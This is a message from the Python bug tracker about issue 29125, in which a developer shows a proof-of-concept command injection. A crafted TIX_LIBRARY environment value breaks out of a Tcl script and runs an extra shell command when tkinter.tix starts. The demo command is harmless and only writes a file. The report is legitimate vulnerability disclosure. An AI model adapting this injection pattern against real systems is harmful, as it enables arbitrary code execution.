This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author serhiy.storchaka
Recipients benjamin.peterson, christian.heimes, larry, ned.deily, serhiy.storchaka, symphorien, terry.reedy, zach.ware
Date 2017-01-14.12:57:45
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1484398665.94.0.146711673799.issue29125@psf.upfronthosting.co.za>
In-reply-to
Content
TclError in Terry's example is raised because Tcl script has unpaired braces. You should add "{" at the end of TIX_LIBRARY.

Here is working exploit:

$ TIX_LIBRARY="/dev/null}; exec python3 -m this >spoiled; set x {"  python3 -c "from tkinter.tix import Tk; Tk()"

It creates the file "spoiled" in current directory containing The Zen of Python.
History
Date User Action Args
2017-01-14 12:57:45serhiy.storchakasetrecipients: + serhiy.storchaka, terry.reedy, larry, christian.heimes, benjamin.peterson, ned.deily, zach.ware, symphorien
2017-01-14 12:57:45serhiy.storchakasetmessageid: <1484398665.94.0.146711673799.issue29125@psf.upfronthosting.co.za>
2017-01-14 12:57:45serhiy.storchakalinkissue29125 messages
2017-01-14 12:57:45serhiy.storchakacreate